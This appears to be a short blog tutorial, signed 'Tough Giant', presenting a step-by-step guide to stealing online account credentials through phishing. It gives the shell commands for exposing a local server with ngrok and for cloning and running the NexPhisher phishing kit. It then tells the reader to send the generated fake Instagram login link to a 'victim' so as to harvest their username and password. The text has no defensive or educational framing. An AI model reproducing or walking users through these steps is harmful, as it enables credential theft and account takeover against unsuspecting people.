Hello guys today I will tell you how we can hack any online account with phishing.
So let’s get started
First of all we need a LINUX Distro, here I will use UBUNTU 20.04.1
So first we need to enter the root directory of the LINUX terminal by typing “sudo su”.
Then we will install ngrok on the linux terminal here.
Just download the Ngrok zip file from the website.
and install ngrok in LINUX
Now after installing your ngrok we will test it by typing
“cd Downloads”
As we have installed ngrok in your downloads and set it up in downloads, we will write cd Downloads.
We will now test if our ngrok is working by typing
./ngrok http 80
then it will show a screen like this
Now we will upload our phishing tool here I’ll use NexPhisher
just type the given commands:
apt update
apt install git -y
git clone git: //github.com/htr-tech/nexphisher.git
cd nexphisher
bash setup
bash nexphisher
After typing these commands you will enter nexphisher
Then choose the type of account you want to hack.
Then choose the account type
Choose the traditional login page
Then choose ngrok because it is the easiest process and also the fastest
Then, after selecting it will give you a link for example:
Now we’re done, just send the link to the victim and he or she will see an Instagram login page like this:
And BOOOM !!!!!!!!!!!!
Once they log in to that page, you will receive their account username and password.
Thank you,
Tough Giant
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